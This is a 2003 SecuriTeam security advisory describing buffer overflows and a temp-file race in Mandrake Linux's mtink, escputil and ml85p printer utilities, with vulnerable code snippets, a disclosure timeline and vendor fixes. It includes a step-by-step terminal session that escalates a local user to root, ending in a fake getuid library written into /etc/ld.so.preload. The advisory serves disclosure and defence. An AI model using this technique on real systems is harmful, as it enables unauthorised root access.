[UNIX] Buffer Overflows in Mandrake Linux printer-drivers Package

From: support@securiteam.com
Date: 01/22/03

  • Next message: support@securiteam.com: "[NEWS] YaBB SE Remote Code Execution Vulnerability (/Sources)" 
    From: support@securiteam.com
To: list@securiteam.com
Date: 22 Jan 2003 21:21:01 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Buffer Overflows in Mandrake Linux printer-drivers Package
    ------------------------------------------------------------------------

    SUMMARY

    MandrakeSoft Inc.'s Mandrake Linux includes the printer-drivers package in
    most default installations. Specifically, the following three binaries are
    included:

     * mtink: a status monitor that tracks remaining ink quantity, printing of
    test patterns, and changing and cleaning cartridges, etc. It is maintained
    by Jean-Jacques Sarton (jj.sarton@t-online.de).

     * escputil: a utility to clean and align the heads of Epson Stylus
    printers. It also checks current ink levels in the printer. It is
    maintained by Robert Krawitz (rlk@alum.mit.edu) and Mike Sweet.

     * ml85p: a Linux driver for Samsung ML-85G series printers. It is
    maintained by Rildo Pragana (rildo@pragana.net).

    Multiple vulnerabilities have been found in the tools mentioned above, see
    details below.

    DETAILS

    Three vulnerabilities exist, the worst of which allows local root
    compromise of a target system.

    Vulnerability #1:
    The mtink binary, installed set group id (gid) 'sys' contains a buffer
    overflow in its handling of the HOME environment variable. Successful
    exploitation provides an attacker with 'sys' group privileges. The
    following snippet contains the offending segment of code:

    void readRc(int idx)
    {
        FILE *fp;
        char rcPath[1024];
        ...
        sprintf(rcPath,"%s/.mtinkrc",getenv("HOME"));

    Vulnerability #2:
    The escputil binary, installed set gid 'sys' contains a buffer overflow in
    its parsing of the printer-name command line argument. Successful
    exploitation provides an attacker with 'sys' group privileges.

    Vulnerability #3:
    The ml85p binary, installed set user id root contains a race condition in
    its opening of temporary files. Successful exploitation provides an
    attacker with the ability to create or empty a file with super user
    privileges. The following snippet contains the offending segment of code:

    sprintf(gname,"/tmp/mlg85p%d",time(0));
        if (!(cbmf = fopen(gname,"w+"))) {

    An attacker can easily guess the name of a temporary file and then link
    the guessed file to a file at another location. If the other file does not
    exist, it is created world-writeable; if it does exist, the contents of
    the file are lost. ml85p is, by default, installed without execute
    permissions for 'other':

    $ ls -l /usr/bin/ml85p
    - -rwsr-x--- 1 root sys 12344 Sep 17 12:40 /usr/bin/ml85p*

    The binary, however, does provide execute permissions to the 'sys' group,
    whose privileges can be gained using either of the two exploits in
    Vulnerability #1 or #2. Once 'sys' privileges are obtained, an attacker
    can exploit this race condition.

    The following example walks through a sample attack utilizing the
    above-described methods:
    $ id
    uid=501(farmer) gid=501(farmer) groups=501(farmer)

    $ ./escputil_ex
    Usage : ./escputil_ex [offset]
    Address : 0xbffff6b0
    Exploiting...
    Escputil version 4.2.2, Copyright (C) 2000-2001 Robert Krawitz
    Escputil comes with ABSOLUTELY NO WARRANTY; for details type 'escputil -l'
    This is free software, and you are welcome to redistribute it under
    certain conditions; type 'escputil -l' for details.
    Cleaning heads...
    lpr: unable to print file: client-error-not-found
    /etc/profile.d/alias.sh:31: parse error: condition expected: !=

    $ id
    uid=501(farmer) gid=501(farmer) egid=3(sys) groups=501(farmer)

    $ ls -l /etc/ld.so.preload
    ls: /etc/ld.so.preload: No such file or directory

    $ ./ml85p_ex /etc/ld.so.preload
    Press a key to clean/create /etc/ld.so.preload file
    Wrong file format.
    file position: ffffffff

    $ ls -l /etc/ld.so.preload
    - -rw-rw-rw- 1 root sys 0 Oct 21 09:09 /etc/ld.so.preload

    $ cat > /tmp/lib.c < heredoc> int getuid(void) { return 0; }
    heredoc> EOF

    $ gcc -fPIC -c /tmp/lib.c
    $ gcc -o /tmp/lib.so -shared /tmp/lib.o

    $ echo "/tmp/lib.so" > /etc/ld.so.preload

    $ su -

    # id
    uid=0(root) gid=0(root) groups=0(root)

    Analysis:
    Any attacker with local access to a targeted system can launch this
    attack. The ability to empty or create with root privileges any file on
    the file system provides an attacker with many avenues of exploitation.
    The above-described example is just one way of quickly gaining super user
    privileges on a targeted system.

    Detection:
    Mandrake Linux 9.0 is vulnerable. By default, it includes the following
    versions of the printer-drivers package:
     * printer-utils-1.0-76mdk
     * printer-filters-1.0-76mdk

    Vendor fix and response:
    MandrakeSoft has identified the problems and applied author-provided fixes
    to the escputil and mtink vulnerabilities. A patch written by Till
    Kamppeter was applied to ml85p to fix that vulnerability. Updates are
    provided for Mandrake Linux 8.1 through 9.0 for the printer-drivers
    packages, and ghostscript in 8.0 to fix these vulnerabilities
    (MDKSA-2003:010).

    Disclosure timeline:
    10/06/2002 Issues disclosed to iDEFENSE
    12/26/2002 Issues disclosed to jj.sarton@t-online.de, rlk@alum.mit.edu,
    rildo@pragana.net, and security@linux-mandrake.com
    12/26/2002 Issues disclosed to iDEFENSE clients
    12/26/2002 Vendor responses from rlk@alum.mit.edu, jj.sarton@t-online.de
    12/30/2002 Response from Vincent Danen (vdanen@mandrakesoft.com)
    01/21/2003 Coordinated public disclosure

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:labs@idefense.com> iDEFENSE
    Labs, the vulnerability was discovered by <mailto:appelast@bsquad.sm.pl>
    Karol Wiesek.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

    Relevant Pages